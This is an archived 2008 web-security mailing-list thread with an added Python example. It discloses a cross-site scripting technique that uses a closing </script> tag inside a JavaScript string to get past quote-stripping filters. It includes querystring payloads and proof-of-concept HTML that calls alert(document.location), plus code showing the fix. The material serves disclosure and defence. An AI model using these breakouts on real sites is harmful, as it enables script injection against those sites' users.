WebApp Sec mailing list archives
RE: Script Tag Breakout
From: "PortSwigger" <mail () portswigger net>
Date: Mon, 20 Oct 2008 08:24:07 +0100
Hi Nick

That certainly is a known vector for XSS. For instance, see p139 of XSS Attacks or p410 of The Web App Hacker's Handbook.

Cheers

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Nick Von Dadelszen
Sent: 20 October 2008 02:34
To: webappsec () securityfocus com
Subject: Script Tag Breakout

Hey all,

Not sure if this is a known issue or not but thought I would share. It's not a common situation to occur but I've used it a couple of times in the last couple of years while testing apps.

-- Description --

Able to break out of a string variable without using quotes through the use of a </script> tag. For example, if the code of a page does the following:

    <script>
    somestring = "[your querystring here]";
    </script>

You would normally break out of this with the following:

    querystring=";[code here]

If the code checks for a double or single quote and removes it, you cannot normally break out of this code. However, you are able to close the current script tag, even from within a string variable. So, the following two breakouts work:

    querystring=</script>[HTML here]
    querystring=</script><script>[javascript here]</script>

The resulting code looks something like the following:

    <html>
    <body>
    <h1>Script Tag Breakout PoC</h1>
    <script>
    string = "</script><h1>Parsed HTML Code Here</h1><!--";
    </script>
    </body>
    </html>

Or:

    <html>
    <body>
    <h1>Script Tag Breakout PoC</h1>
    <script>
    string = "</script><script>alert(document.location);</script>";
    </script>
    </body>
    </html>

In the above HTML, the javascript alert function is called regardless of it being contained within a string variable.

-- Tested Browsers --

All versions of IE and Firefox up to and including IE 7 and Firefox 3.
---------------------------------------------------------
Nick von Dadelszen
Lateral Security
www.lateralsecurity.com
---------------------------------------------------------

-------------------------------------------------------------------------
Sponsored by: Watchfire

Methodologies & Tools for Web Application Security Assessment
With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!
https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------
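Added example, not part of the thread: a Python model of why a quote-stripping filter does not prevent the breakout Nick describes, and of the encoding that does. The tokenizer rule (a script element ends at the first `</script` followed by whitespace, `/` or `>`, whatever JavaScript context it sits in) is an assumed simplification of the HTML5 script-data state; the page template and payload are constructed to match the PoC above.

```python
import json
import re

# Constructed payload shaped like the PoC: it contains no quote characters.
PAYLOAD = "</script><h1>Parsed HTML Code Here</h1><!--"

# Assumed simplification of the browser tokenizer: a <script> element ends at
# '</script' followed by whitespace, '/' or '>', case-insensitively, no matter
# what JavaScript string or comment the text happens to be inside.
SCRIPT_START = re.compile(r"<script\b[^>]*>", re.IGNORECASE)
SCRIPT_END = re.compile(r"</script(?=[\s/>])", re.IGNORECASE)


def naive_literal(value: str) -> str:
    """The inadequate filter from the post: strip quotes, then wrap in quotes."""
    return '"' + value.replace('"', "").replace("'", "") + '"'


def safe_literal(value: str) -> str:
    """Build a JS string literal that is safe inside <script> text.

    json.dumps escapes quotes, backslashes, control and non-ASCII characters;
    the extra replacements encode '<', '>' and '&' as \\uXXXX so that no
    '</script' sequence (and no HTML comment opener) can survive in the output.
    """
    literal = json.dumps(value, ensure_ascii=True)
    for ch, esc in (("<", r"\u003c"), (">", r"\u003e"), ("&", r"\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def roundtrips(value: str) -> bool:
    """json.loads applies the same \\uXXXX rules a JS engine would here."""
    return json.loads(safe_literal(value)) == value


def render_page(literal: str) -> str:
    """Constructed page shaped like the PoC: the literal lands in a JS string."""
    return ("<html><body><h1>Script Tag Breakout PoC</h1>\n<script>\n"
            f"somestring = {literal};\n</script>\n</body></html>")


def script_bodies(html: str) -> list:
    """Return script element bodies as the tokenizer rule above delimits them."""
    bodies, pos = [], 0
    while (start := SCRIPT_START.search(html, pos)):
        end = SCRIPT_END.search(html, start.end())
        bodies.append(html[start.end():end.start()] if end else html[start.end():])
        if not end:
            break
        pos = end.end()
    return bodies
```

With the naive filter the first script body is truncated at the injected `</script` and the `<h1>` lands in HTML context; with `safe_literal` the whole value stays inside the one script body and still decodes to the original string.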
Current thread:
- Script Tag Breakout Nick Von Dadelszen (Oct 19)
- RE: Script Tag Breakout PortSwigger (Oct 20)
- Classic ASP security course at OWASP summit Calderon, Juan Carlos (GE, Corporate, consultant) (Oct 20)
- Re: Script Tag Breakout Taufiq Ali (Oct 21)
- RE: Script Tag Breakout Auri Rahimzadeh (Oct 21)
- RE: Script Tag Breakout Stefano Di Paola (Oct 21)
- Script Tag Breakout Nick Von Dadelszen (Oct 21)
- FINAL NOTICE: OWASP Portugal EU Summit Dave Wichers (Oct 27)
- RE: Script Tag Breakout Auri Rahimzadeh (Oct 21)